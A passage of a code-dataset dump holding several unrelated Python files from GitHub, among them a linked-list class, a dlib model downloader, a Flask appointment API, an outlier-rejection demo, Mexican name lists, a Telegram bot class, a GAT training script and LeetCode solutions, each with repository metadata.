return self.head\n while pointer.next is not None:\n if counter == position:\n new.next = pointer.next\n pointer.next = new\n break\n counter += 1\n pointer = pointer.next\n return self.head\n\n def insert_after(self, value, position):\n new = Node()\n pointer = self.head\n counter = 1\n if position == 0:\n new.next = self.head\n self.head = new\n return self.head\n while pointer.next is not None:\n if counter == position:\n new.next = pointer.next\n pointer.next = new\n break\n counter += 1\n pointer = pointer.next\n return self.head\n\n def __str__(self):\n current = self.head\n output = \"\"\n\n while current:\n output += \"{ \" + current.value + \" } -> \"\n current = current.next\n\n output += \"NULL\"\n return output\n\n def kth_from_end(self, k):\n if k < 0:\n raise ValueError\n\n for _ in range(k):\n if self.head.next is None:\n raise ValueError\n self.head = self.head.next\n\n while self.head.next is not None:\n self.head = self.head.next\n\n return self.head.value\n\n def merge_list(self, a, b):\n a_curr = a.head\n b_curr = b.head\n\n while a_curr and b_curr:\n\n a_next = a_curr.next\n a_curr.next = b_curr\n a_curr = a_next\n\n b_next = b_curr.next\n b_curr.next = a_curr\n b_curr = b_next\n\n if a_curr.next is None:\n a_curr.next = b_curr\n return a\n return a\n","repo_name":"KSTOV/data-structures-and-algorithms","sub_path":"python/code_challenges/link_list_insertions/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71281657328","text":"import os\nimport requests\nimport bz2, shutil\n\ndef download_dlib_model():\n print_orderly(\"Get dlib model\", 60)\n dlib_model_link = \"http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2\"\n print(\"Downloading dlib model...\")\n with requests.get(dlib_model_link, stream=True) as r:\n print(\"Zip file size: \", np.round(len(r.content) / 1024 / 1024, 2), \"MB\")\n destination = (\n \"dlib_models\" + os.path.sep + \"shape_predictor_68_face_landmarks.dat.bz2\"\n )\n if not os.path.exists(destination.rsplit(os.path.sep, 1)[0]):\n os.mkdir(destination.rsplit(os.path.sep, 1)[0])\n print(\"Saving dlib model...\")\n with open(destination, \"wb\") as fd:\n for chunk in r.iter_content(chunk_size=32678):\n fd.write(chunk)\n print(\"Extracting dlib model...\")\n with bz2.BZ2File(destination) as fr, open(\n \"dlib_models/shape_predictor_68_face_landmarks.dat\", \"wb\"\n ) as fw:\n shutil.copyfileobj(fr, fw)\n print(\"Saved: \", destination)\n print_orderly(\"done\", 60)\n\n os.remove(destination)\n","repo_name":"v-datnvt2/Driver-Drowsiness-Behavior","sub_path":"FaceDetector/shape_predictor/download_dlib_model.py","file_name":"download_dlib_model.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5409724881","text":"import os\n\nimport utils.io as io\n\n\ndef prepare_hico(exp_const,data_const):\n io.mkdir_if_not_exists(exp_const.exp_dir)\n \n print('Writing constants to exp dir ...')\n data_const_json = os.path.join(exp_const.exp_dir,'data_const.json')\n data_const.to_json(data_const_json)\n\n exp_const_json = os.path.join(exp_const.exp_dir,'exp_const.json')\n exp_const.to_json(exp_const_json)\n\n print('Loading anno_list.json ...')\n anno_list = io.load_json_object(data_const.anno_list_json)\n \n print('Creating input json for faster rcnn ...')\n images_in_out = [None]*len(anno_list)\n for i, anno in enumerate(anno_list):\n global_id = anno['global_id']\n image_in_out = dict()\n image_in_out['in_path'] = os.path.join(\n data_const.images_dir,\n anno['image_path_postfix'])\n image_in_out['out_dir'] = os.path.join(\n data_const.proc_dir,\n 'faster_rcnn_boxes')\n image_in_out['prefix'] = f'{global_id}_'\n images_in_out[i] = image_in_out\n\n images_in_out_json = os.path.join(\n exp_const.exp_dir,\n 'faster_rcnn_im_in_out.json')\n io.dump_json_object(images_in_out,images_in_out_json)\n\n\n","repo_name":"BigRedT/no_frills_hoi_det","sub_path":"exp/detect_coco_objects/prepare_data_for_faster_rcnn.py","file_name":"prepare_data_for_faster_rcnn.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"2"} +{"seq_id":"72726206445","text":"\"\"\"Collect raw time schedules from atletiek.nu.\"\"\"\n\n\nimport sqlite3\n\nfrom tfcompetition.competition_selector import CompetitionSelector\nfrom tfcompetition.tfcompetition import TFCompetition\nfrom tfcompetition.schedule.schedule_parser import ScheduleParser\n\n\ndef main():\n \"\"\"Collect schedule tables to investigate the contents.\"\"\"\n # Make sure that base tables exist.\n conn = sqlite3.connect('raw_schedule.db')\n curs = conn.cursor()\n curs.execute(\n '''\n CREATE TABLE if not exists competitions (\n comp_id INTEGER,\n comp_name TEXT\n );\n ''')\n curs.execute(\n '''\n CREATE TABLE if not exists schedules (\n comp_id INTEGER,\n start_time TEXT,\n time_link TEXT,\n start_group TEXT,\n group_link TEXT,\n event TEXT,\n event_link TEXT,\n final_column TEXT,\n final_link TEXT\n );\n ''')\n # Select competitions.\n while True:\n # Let the user choose a competition.\n sel = CompetitionSelector(initialise=False)\n sel.select('Choose a competition (Enter to stop)')\n if sel.competition <= 0:\n print('Stopping collection of competitions.')\n conn.commit()\n conn.close()\n return\n # Show the name of the competition.\n competition = TFCompetition(sel.competition)\n parser = ScheduleParser(competition.schedule_url)\n if not parser.tree:\n continue\n print('{}: {}'.format(sel.competition, parser.name))\n # Insert or Update into the competition tables\n\n def row_generator():\n table = None\n try:\n table = parser.get_table()\n except IndexError:\n return\n for row in table.body.rows:\n yield(\n int(sel.competition),\n row.cells[0].string, row.cells[0].link,\n row.cells[1].string, row.cells[1].link,\n row.cells[2].string, row.cells[2].link,\n row.cells[3].string, row.cells[3].link\n )\n\n curs.execute(\n '''\n SELECT comp_id FROM competitions\n WHERE comp_id = ?;\n ''',\n (int(sel.competition),))\n if curs.fetchone():\n print('Updating competition ...')\n curs.execute(\n '''\n UPDATE competitions\n SET comp_name = ?\n WHERE comp_id = ?;\n ''',\n (parser.name, int(sel.competition)))\n curs.execute(\n '''\n DELETE FROM schedules\n WHERE comp_id = ?\n ''',\n (int(sel.competition),))\n curs.executemany(\n '''\n INSERT INTO schedules (\n comp_id, start_time, time_link,\n start_group, group_link, event,\n event_link, final_column, final_link)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n ''',\n row_generator())\n else:\n print('Inserting competition ...')\n curs.execute(\n '''\n INSERT INTO competitions (comp_id, comp_name)\n VALUES (?, ?)\n ''',\n (int(sel.competition), parser.name))\n curs.executemany(\n '''\n INSERT INTO schedules (\n comp_id, start_time, time_link,\n start_group, group_link, event,\n event_link, final_column, final_link)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n ''',\n row_generator())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PeterPesch/track-and-field-competition","sub_path":"collect_raw_schedules.py","file_name":"collect_raw_schedules.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31066223866","text":"import json\nimport os\nimport uuid\n\nfrom flask import request\nfrom flask import jsonify\nfrom datetime import datetime\n\nfrom utils import initialize_logger\n\nlogger = initialize_logger('controller.py')\n\n\ndef load_doctors_data():\n return json.load(open(os.getenv('DOCTORS_DATA_FILE'), ))\n\n\ndef load_appointments_data():\n return json.load(open(os.getenv('APPOINTMENTS_DATA_FILE'), ))\n\n\ndef update_doctors_data(doctors):\n with open(os.getenv('DOCTORS_DATA_FILE'), 'w') as f:\n json.dump(doctors, f)\n\n\ndef update_appointments_data(appointments):\n with open(os.getenv('APPOINTMENTS_DATA_FILE'), 'w') as f:\n json.dump(appointments, f)\n\n\ndef is_number(number):\n try:\n float(number)\n return True\n except ValueError:\n return False\n\n\ndef get_doctors():\n return jsonify(load_doctors_data()), 200\n\n\ndef get_appointments():\n body = request.args\n if any(key not in body for key in ['doctor id', 'time']):\n return 'invalid request, missing data', 422\n\n doctor_id, time = body.get('doctor id'), body.get('time')\n\n if not is_number(time):\n return 'invalid time', 422\n\n if doctor_id not in [doctor['id'] for doctor in load_doctors_data()]:\n return 'invalid doctor id', 422\n\n result_appointments = []\n target_date = datetime.fromtimestamp(float(time)).date()\n for appointment in load_appointments_data():\n curr_appointment_date = datetime.fromtimestamp(float(appointment['time'])).date()\n if target_date == curr_appointment_date:\n result_appointments.append(appointment)\n return jsonify(result_appointments), 200\n\n\ndef delete_appointment():\n body = request.form\n if 'appointment id' not in body:\n return 'invalid request, missing appointment id', 422\n appointments = load_appointments_data()\n remaining_appointments = [appointment for appointment in appointments if\n appointment['id'] != body.get('appointment id')]\n if len(appointments) != len(remaining_appointments):\n update_appointments_data(remaining_appointments)\n return 'deleted', 200\n return 'appointment not found', 200\n\n\ndef book_appointment():\n body = request.form\n if any(key not in body for key in ['first name', 'last name', 'time', 'kind', 'doctor id']):\n return 'invalid appointment, missing data', 422\n\n first_name, last_name, time, kind, doctor_id = body.get('first name'), body.get('last name'), body.get(\n 'time'), body.get('kind'), body.get('doctor id')\n\n if not is_number(time):\n return 'invalid time', 422\n if kind not in ['New Patient', 'Follow-up']:\n return 'invalid appointment kind', 422\n if doctor_id not in [doctor['id'] for doctor in load_doctors_data()]:\n return 'invalid doctor id', 422\n\n time_object = datetime.fromtimestamp(float(time))\n if time_object.minute % 15 != 0 or time_object.second != 0 or time_object.microsecond != 0:\n return 'invalid time', 422\n\n new_appointment = {\n 'id': str(uuid.uuid4()),\n \"doctor id\": doctor_id,\n \"first Name\": first_name,\n \"last Name\": last_name,\n \"time\": time,\n \"kind\": kind\n }\n appointments = load_appointments_data()\n appointments.append(new_appointment)\n update_appointments_data(appointments)\n return new_appointment, 200\n","repo_name":"yuliwilliam/notable-health-backend","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19346970050","text":"import numpy as np\n\nnp.random.seed(18318) # get consistent random results\n\nN = 500 # total measurement count\nfrac_contaminated = 0.5 # fraction of sample that will be contaminated\n\n# symmetric, uncontaminated distribution\nmu = 0 \nsigma_uncontaminated = 1\nuncontaminated_samples = np.random.normal(mu, sigma_uncontaminated, \n int(N * (1 - frac_contaminated)))\n\n# symmetric, contaminated distribution\nsigma_contaminated = 5\ncontaminated_samples = np.random.normal(mu, sigma_contaminated, \n int(N * frac_contaminated))\n\n# create whole dataset\ndata = np.concatenate((uncontaminated_samples, contaminated_samples))\nnp.random.shuffle(data)\n\n# plot data\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(8,5))\nax = plt.subplot(111)\n\nydata = np.random.uniform(0, 1, N) # project randomly into 2D for better visualization\n\nax.plot(contaminated_samples, ydata[:int(N * frac_contaminated)], \"k.\", \n label=\"Pre-RCR dataset\", alpha=0.75, ms=4)\nax.plot(uncontaminated_samples, ydata[int(N * frac_contaminated):], \"k.\", \n alpha=0.75, ms=4)\n\nplt.xlim(-15, 15)\nplt.ylim(0, 1)\nplt.xlabel(\"data\")\nplt.yticks([])\n\nbox = ax.get_position()\nax.set_position([box.x0, box.y0, box.width * 0.65, box.height])\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\nplt.show()\n\n# get results pre-RCR\ncontaminated_mu = np.mean(data)\ncontaminated_sigma = np.std(data)\nprint(contaminated_mu, contaminated_sigma)\n\n# perform RCR\nimport rcr\n\n# initialize RCR with rejection technique:\n# (chosen from shape of uncontaminated + contaminated distribution)\nr = rcr.RCR(rcr.SS_MEDIAN_DL)\nr.performBulkRejection(data) # perform outlier rejection\n\n# View results post-RCR\ncleaned_mu = r.result.mu\ncleaned_sigma = r.result.stDev\nprint(cleaned_mu, cleaned_sigma)\n\n# plot rejections\ncleaned_data = r.result.cleanY\n\nflags = r.result.flags \n# list of booleans corresponding to the original dataset, \n# true if the corresponding datapoint is not an outlier.\n\ncleaned_data_indices = r.result.indices \n# indices of data in original dataset that are not outliers\n\nplt.figure(figsize=(8,5))\nax = plt.subplot(111)\nax.plot(data[cleaned_data_indices], ydata[cleaned_data_indices], \"b.\", \n label=\"RCR-accepted points\", alpha=0.75, ms=4)\n\nplt.xlim(-15, 15)\nplt.ylim(0, 1)\nplt.xlabel(\"data\")\nplt.yticks([])\n\nbox = ax.get_position()\nax.set_position([box.x0, box.y0, box.width * 0.65, box.height])\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\nplt.show()\n\n\n# Weighting Data:\n\nfrom scipy.stats import norm\n\ndef weight_data(datapoint):\n return norm.pdf(datapoint, loc=mu, scale=sigma_uncontaminated)\n\nweights = weight_data(data)\n\n# perform RCR\nr = rcr.RCR(rcr.SS_MEDIAN_DL)\nr.performBulkRejection(weights, data) # perform outlier rejection, now with weights\n\n\n# View results post-RCR\ncleaned_mu = r.result.mu\ncleaned_sigma = r.result.stDev\nprint(cleaned_mu, cleaned_sigma)\n\n\n# plot rejections\ncleaned_data = r.result.cleanY\ncleaned_data_indices = r.result.indices\n\nplt.figure(figsize=(8,5))\nax = plt.subplot(111)\nax.plot(data[cleaned_data_indices], ydata[cleaned_data_indices], \"b.\", \n label=\"RCR-accepted points,\\nwith weights applied to data\", alpha=0.75, ms=4)\n\nplt.xlim(-15, 15)\nplt.ylim(0, 1)\nplt.xlabel(\"data\")\nplt.yticks([])\n\nbox = ax.get_position()\nax.set_position([box.x0, box.y0, box.width * 0.65, box.height])\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\nplt.show()","repo_name":"nickk124/RCR","sub_path":"docs/source/examples/singlevalue/singlevalue.py","file_name":"singlevalue.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"71882612206","text":"male = [\n 'Santiago',\n 'Mateo',\n 'Diego',\n 'Miguel Ángel',\n 'Emiliano',\n 'Sebastián',\n 'Leonardo',\n 'José Ángel',\n 'Jesús',\n 'Alejandro',\n 'Luis Ángel',\n 'Daniel',\n 'Alexander',\n 'Juan Pablo',\n 'Gael',\n 'Fernando',\n 'Rodrigo',\n 'Matías',\n 'Emmanuel',\n 'Eduardo',\n 'Ángel Gabriel',\n 'David',\n 'Iker',\n 'Juan Carlos',\n 'Ángel',\n 'José Luis',\n 'Jonathan',\n 'Maximiliano',\n 'Ricardo',\n 'Alexis',\n 'José Manuel',\n 'Damián',\n 'Kevin',\n 'José Antonio',\n 'Gabriel',\n 'Luis Fernando',\n 'Cristian',\n 'Axel',\n 'Rafael',\n 'Marco Antonio',\n 'Alan',\n 'Isaac',\n 'Mauricio',\n 'Josue',\n 'José Miguel',\n 'Adrián',\n 'Uriel',\n 'Brayan',\n 'Samuel',\n 'José DeJesús',\n 'Juan Diego',\n 'Javier',\n 'Juan Manuel',\n 'Carlos',\n 'Francisco',\n 'Elías',\n 'Emilio',\n 'Brandon',\n 'Julio César',\n 'Nicolás',\n 'Juan José',\n 'Andrés',\n 'Aarón',\n 'Antonio',\n 'Tadeo',\n 'Leonel',\n 'Francisco Javier',\n 'Jesús Antonio',\n 'Carlos Daniel',\n 'Jesús Alejandro',\n 'José Eduardo',\n 'Gerardo',\n 'Iván',\n 'Abraham',\n 'Israel',\n 'Ángel De Jesús',\n 'Roberto',\n 'Miguel',\n 'Luis Antonio',\n 'Oscar',\n 'Erick',\n 'Omar',\n 'Víctor Manuel',\n 'Saúl',\n 'Jesús Eduardo',\n 'Ángel Daniel',\n 'Christopher',\n 'José María',\n 'Jorge',\n 'Dylan',\n 'Arturo',\n 'Ian',\n 'Juan Antonio',\n 'Emanuel',\n 'Bruno',\n 'Cristopher',\n 'César',\n 'Luis Enrique',\n 'Manuel',\n 'Pedro'\n]\n\nfemale = [\n 'Ximena',\n 'María José',\n 'Valentina',\n 'María Fernanda',\n 'Valeria',\n 'Sofía',\n 'Camila',\n 'Regina',\n 'Renata',\n 'Maria Guadalupe',\n 'Natalia',\n 'Daniela',\n 'Andrea',\n 'Victoria',\n 'Isabella',\n 'Samantha',\n 'Mariana',\n 'Fernanda',\n 'Fatima',\n 'Vanessa',\n 'Jimena',\n 'Dulce Maria',\n 'Alondra',\n 'Romina',\n 'Elizabeth',\n 'Alejandra',\n 'Nicole',\n 'Guadalupe',\n 'Melissa',\n 'Alexa',\n 'Esmeralda',\n 'AnaSofía',\n 'Kimberly',\n 'Evelyn',\n 'Abigail',\n 'Jennifer',\n 'Yamileth',\n 'Ana Victoria',\n 'Emily',\n 'Abril',\n 'Estefanía',\n 'Monserrat',\n 'Ximena Guadalupe',\n 'Paola',\n 'Miranda',\n 'Melany',\n 'Carolina',\n 'Paulina',\n 'Zoe',\n 'Gabriela',\n 'Liliana',\n 'Elisa',\n 'Itzel',\n 'Ivanna',\n 'Julieta',\n 'Jazmin',\n 'Alexandra',\n 'Yaretzi',\n 'Lizbeth',\n 'Marisol',\n 'Adriana',\n 'Naomi',\n 'Danna Paola',\n 'Rebeca',\n 'Diana',\n 'Mayte',\n 'Allison',\n 'Ana Paula',\n 'Luz Maria',\n 'Camila Guadalupe',\n 'Mía',\n 'Dayana',\n 'Wendy',\n 'Ana Karen',\n 'Michelle',\n 'Monserrat',\n 'Karla',\n 'Alexia',\n 'Yoselin',\n 'Lucero',\n 'Maria Del Carmen',\n 'Melanie',\n 'Valeria Guadalupe',\n 'Jaqueline',\n 'Aylin',\n 'Maria Alejandra',\n 'Danna Sofía',\n 'Estrella',\n 'Lucía',\n 'Maria De Jesús',\n 'Sarahi',\n 'Kenia',\n 'Tania',\n 'Luciana',\n 'Jocelyn',\n 'Maria Isabel',\n 'Ana Paola',\n 'Sofía Guadalupe',\n 'Sara',\n 'Jacqueline'\n]\n\nlast = [\n 'Hernandez',\n 'Garcia',\n 'Martinez',\n 'Lopez',\n 'Gonzalez',\n 'Perez',\n 'Rodriguez',\n 'Sanchez',\n 'Ramirez',\n 'Cruz',\n 'Flores',\n 'Gomez',\n 'Morales',\n 'Vazquez',\n 'Reyes',\n 'Jimenez',\n 'Torres',\n 'Diaz',\n 'Gutierrez',\n 'Ruiz',\n 'Mendoza',\n 'Aguilar',\n 'Ortiz',\n 'Moreno',\n 'Castillo',\n 'Romero',\n 'Alvarez',\n 'Mendez',\n 'Chavez',\n 'Rivera',\n 'Juarez',\n 'Ramos',\n 'Dominguez',\n 'Herrera',\n 'Medina',\n 'Castro',\n 'Vargas',\n 'Guzman',\n 'Velazquez',\n 'Muoz',\n 'Rojas',\n 'de La Cruz',\n 'Contreras',\n 'Salazar',\n 'Luna',\n 'Ortega',\n 'Santiago',\n 'Guerrero',\n 'Estrada',\n 'Bautista',\n 'Cortes',\n 'Soto',\n 'Alvarado',\n 'Espinoza',\n 'Lara',\n 'Avila',\n 'Rios',\n 'Cervantes',\n 'Silva',\n 'Delgado',\n 'Vega',\n 'Marquez',\n 'Sandoval',\n 'Carrillo',\n 'Fernandez',\n 'Leon',\n 'Mejia',\n 'Solis',\n 'Rosas',\n 'Ibarra',\n 'Valdez',\n 'Nuez',\n 'Campos',\n 'Santos',\n 'Camacho',\n 'Navarro',\n 'Maldonado',\n 'Rosales',\n 'Acosta',\n 'Pea',\n 'Miranda',\n 'Cabrera',\n 'Trejo',\n 'Valencia',\n 'Nava',\n 'Pacheco',\n 'Robles',\n 'Molina',\n 'Castaeda',\n 'Fuentes',\n 'Rangel',\n 'Huerta',\n 'Meza',\n 'Padilla',\n 'Espinosa',\n 'Aguirre',\n 'Salas',\n 'Cardenas',\n 'Orozco',\n 'Valenzuela',\n 'Ayala',\n 'Zuiga',\n 'Ochoa',\n 'Mora',\n 'Serrano',\n 'Salinas',\n 'Tapia',\n 'Olvera',\n 'Duran',\n 'Suarez',\n 'Macias',\n 'Zamora',\n 'Arellano',\n 'Calderon',\n 'Barrera',\n 'Villegas',\n 'Zavala',\n 'Gallegos',\n 'Lozano',\n 'Beltran',\n 'Velasco',\n 'Figueroa',\n 'Franco',\n 'Galvan',\n 'Montes',\n 'Sosa',\n 'Villanueva',\n 'Arias',\n 'Andrade',\n 'Antonio',\n 'Marin',\n 'Vasquez',\n 'Esquivel',\n 'Ponce',\n 'Corona',\n 'Garza',\n 'Alonso',\n 'Palacios',\n 'Trujillo',\n 'Bernal',\n 'Pineda',\n 'Rocha',\n 'Cortez',\n 'Rubio',\n 'Escobar',\n 'Galindo',\n 'Villa',\n 'de Jesus',\n 'Cano',\n 'Benitez',\n 'Cuevas',\n 'Bravo',\n 'Mata',\n 'Osorio',\n 'Carmona',\n 'Montoya',\n 'Enriquez',\n 'Rivas',\n 'Parra',\n 'Cisneros',\n 'Resendiz',\n 'Cordova',\n 'de La Rosa',\n 'Tellez',\n 'Vera',\n 'Tovar',\n 'Zarate',\n 'Leyva',\n 'Quintero',\n 'Quiroz',\n 'Salgado',\n 'Becerra',\n 'Arroyo',\n 'Peralta',\n 'Esparza',\n 'Avalos',\n 'Roman',\n 'Barajas',\n 'Felix',\n 'Guevara',\n 'Murillo',\n 'Olivares',\n 'de Leon',\n 'Castellanos',\n 'Villarreal',\n 'Lugo',\n 'Montiel',\n 'Angeles',\n 'Villalobos',\n 'Segura',\n 'Saucedo',\n 'Gallardo',\n 'Chan',\n 'Reyna',\n 'Mercado',\n 'Davila',\n 'Navarrete',\n 'Paredes',\n 'Magaa',\n 'Guerra'\n]\n","repo_name":"xioren/JohnDoe","sub_path":"john_doe/names/mexico.py","file_name":"mexico.py","file_ext":"py","file_size_in_byte":6143,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9692263968","text":"from ..base import InlineQueryResult, Field, InputMessageContent\n\nfrom ..inline_keyboard_markup import InlineKeyboardMarkup\n\n\nclass InlineQueryResultVoice(InlineQueryResult):\n\n voice_url = Field()\n title = Field()\n caption = Field()\n parse_mode = Field()\n voice_duration = Field()\n reply_markup = Field()\n input_message_content = Field()\n\n def __init__(self,\n id: str,\n voice_url: str,\n title: str,\n caption: str = None,\n parse_mode: str = None,\n voice_duration: int = None,\n reply_markup: InlineKeyboardMarkup = None,\n input_message_content: InputMessageContent = None\n ):\n super().__init__(id, 'voice')\n\n self.voice_url = \\\n Field(voice_url, [str])\n\n self.title = \\\n Field(title, [str])\n\n self.caption = \\\n Field(caption, [str])\n\n self.parse_mode = \\\n Field(parse_mode, [str])\n\n self.voice_duration = \\\n Field(voice_duration, [int])\n\n self.reply_markup = \\\n Field(reply_markup, [InlineKeyboardMarkup])\n\n self.input_message_content = \\\n Field(input_message_content, [InputMessageContent])\n","repo_name":"cmd410/OrigamiBot","sub_path":"origamibot/core/teletypes/inline_query_result/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"2"} +{"seq_id":"10274982710","text":"# from torch_geometric.data import DataLoader, Dataset, Data\n\n# from torchvision.transforms import ToTensor\n# import networkx as nx\n# import numpy as np\n# import torch\n# import cv2\n\n# class SIFTGraphDataset(Dataset):\n# def __init__(self, img_paths, labels):\n# self.img_paths = img_paths\n# self.labels = labels\n# self.transforms = ToTensor()\n\n# def __getitem__(self, idx):\n# # Load image\n# img_path = self.img_paths[idx]\n# img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\n\n# # Extract SIFT features\n# sift = cv2.SIFT_create()\n# kp, des = sift.detectAndCompute(img, None)\n\n# # Create graph and add nodes\n# G = nx.Graph()\n# for i in range(len(kp)):\n# G.add_node(i, pos=(kp[i].pt[0], kp[i].pt[1]), img=idx, features=des[i])\n\n# # Add edges\n# if idx == 0:\n# # For the first image, add self-loops\n# for i in range(len(kp)):\n# G.add_edge(i, i)\n# else:\n# # For other images, match features with the first image\n# img1 = cv2.imread(self.img_paths[0], cv2.IMREAD_GRAYSCALE)\n# kp1, des1 = sift.detectAndCompute(img1, None)\n# bf = cv2.BFMatcher(cv2.NORM_L2, crossCheck=True)\n# matches = bf.match(des, des1)\n# matches = sorted(matches, key=lambda x:x.distance)\n# k = min(50, len(matches))\n# matches = matches[:k]\n# for match in matches:\n# i1 = match.queryIdx\n# i2 = match.trainIdx\n# G.add_edge(i1, i2)\n\n# # Convert to adjacency matrix\n# A = nx.adjacency_matrix(G)\n\n# # Convert to tensor\n# A = torch.tensor(A.todense())\n\n# # Get node features\n# node_features = []\n# for node in G.nodes():\n# node_features.append(G.nodes[node]['features'])\n# node_features = torch.tensor(node_features)\n\n# # Get node positions\n# node_positions = []\n# for node in G.nodes():\n# node_positions.append(G.nodes[node]['pos'])\n# node_positions = torch.tensor(node_positions)\n\n# edge_index = torch.tensor(np.array(A.nonzero()), dtype=torch.long)\n\n\n# # Create PyTorch geometric data object\n# data = Data(x=node_features.float(), pos=node_positions.float(), edge_index=edge_index, edge_attr=None)\n\n# # Normalize node positions to be in [-1,1] range\n# data.pos = (data.pos - data.pos.min(dim=0).values) / (data.pos.max(dim=0).values - data.pos.min(dim=0).values) * 2 - 1\n\n# # Apply transforms to data\n# data = self.transforms(data)\n\n# # Get label\n# label = torch.tensor(self.labels[idx])\n\n# return data, label\n\n# def __len__(self):\n# return len(self.img_paths)\n\n\n############################################################3\n\nimport torch\nimport torch.optim as optim\nfrom sklearn.metrics import f1_score\n\ndef train(model, optimizer, criterion, features, adj, labels, idx_train, idx_val, epochs):\n for epoch in range(epochs):\n model.train()\n optimizer.zero_grad()\n output = model(features, adj)\n loss = criterion(output[idx_train], labels[idx_train])\n loss.backward()\n optimizer.step()\n\n train_loss = loss.item()\n val_loss, val_acc, val_f1 = evaluate(model, criterion, features, adj, labels, idx_val)\n print(\"Epoch [{}/{}], Train Loss: {:.4f}, Val Loss: {:.4f}, Val Acc: {:.4f}, Val F1: {:.4f}\"\n .format(epoch+1, epochs, train_loss, val_loss, val_acc, val_f1))\n\ndef evaluate(model, criterion, features, adj, labels, idx_val):\n model.eval()\n with torch.no_grad():\n output = model(features, adj)\n loss = criterion(output[idx_val], labels[idx_val])\n preds = output.argmax(dim=1)\n acc = (preds[idx_val] == labels[idx_val]).sum().item() / idx_val.shape[0]\n f1 = f1_score(labels[idx_val].cpu().numpy(), preds[idx_val].cpu().numpy(), average='micro')\n return loss.item(), acc, f1\n\n# Training hyperparameters\nlr = 0.005\nweight_decay = 5e-4\nn_epochs = 200\npatience = 20\n\n# Create the GAT model\nnfeat = features.shape[1]\nnhid = 8\nnclass = labels.max().item() + 1\ndropout = 0.6\nalpha = 0.2\nnheads = 8\n\nmodel = GAT(nfeat, nhid, nclass, dropout, alpha, nheads)\n\n# Create optimizer and loss function\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\ncriterion = nn.CrossEntropyLoss()\n\n# Train the model\ntrain(model, optimizer, criterion, features, adj, labels, idx_train, idx_val, n_epochs)\n","repo_name":"NMMallick/GAT-Feature-Matching","sub_path":"scripts/TrainModel.py","file_name":"TrainModel.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26726947388","text":"# 49: Group Anagrams\n# https://leetcode.com/problems/group-anagrams/\n\nfrom collections import defaultdict\n\nclass Solution:\n def groupAnagrams(self, strs: list[str]) -> list[list[str]]:\n tmap = defaultdict(list)\n \n for s in strs:\n tmap[str(sorted(s))].append(s)\n \n return list(tmap.values())\n\n\nif __name__ == \"__main__\":\n o = Solution()\n\n # INPUT\n strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\n\n # OUTPUT\n result = o.groupAnagrams(strs)\n print(result)\n","repo_name":"poseidon-code/NeetCode-Solutions","sub_path":"01-arrays_&_hashing/00049-Group_Anagrams/00049-group_anagrams.py","file_name":"00049-group_anagrams.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"3281047265","text":"class Solution:\n def nextGreaterElements(self, nums: List[int]) -> List[int]:\n length = len(nums)\n nums.extend(nums[:])\n stack, res = [], [-1] * len(nums)\n for index, num in enumerate(nums):\n while stack and num > stack[-1][1]:\n i, n = stack.pop()\n res[i] = num\n stack.append((index, num))\n return res[:length]\n","repo_name":"pqnguyen/CompetitiveProgramming","sub_path":"platforms/leetcode/NextGreaterElementII.py","file_name":"NextGreaterElementII.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71050059886","text":"from typing import List\nclass Solution:\n # 使用回溯的方法\n def subsets(self, nums: List[int]) -> List[List[int]]:\n ans = [[]]\n l = len(nums)\n def dep(temp=[],index=0):\n for i in range(index,l):\n temp.append(nums[i])\n ans.append(temp[:])\n dep(temp,i+1)\n temp.pop()\n dep()\n return ans\n # 使用的集合的方式\n def subsets_1(self, nums: List[int]) -> List[List[int]]:\n ans = [[]]\n for i in nums:\n ans += [j+[i] for j in ans]\n return ans\n\ns =Solution()\nprint(s.subsets_1([1,2,3]))","repo_name":"elfisworking/PY_Leet","sub_path":"leetcode_python/78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24005033230","text":"from main.models.item import Item\nfrom main.models.tag import Tag\nfrom main.models.order import Order, LineItem\nfrom main.models._db import db\nfrom app import App\n\napp = App()\n\n# 生成假資料\nfake_items = [\n Item(name=\"青椒\", price=20, unit=\"個\", tag_id=1),\n Item(name=\"香菇\", price=15, unit=\"個\", tag_id=1),\n Item(name=\"杏鮑菇\", price=15, unit=\"個\", tag_id=1),\n Item(name=\"大根(白蘿蔔)\", price=20, unit=\"個\", tag_id=1),\n 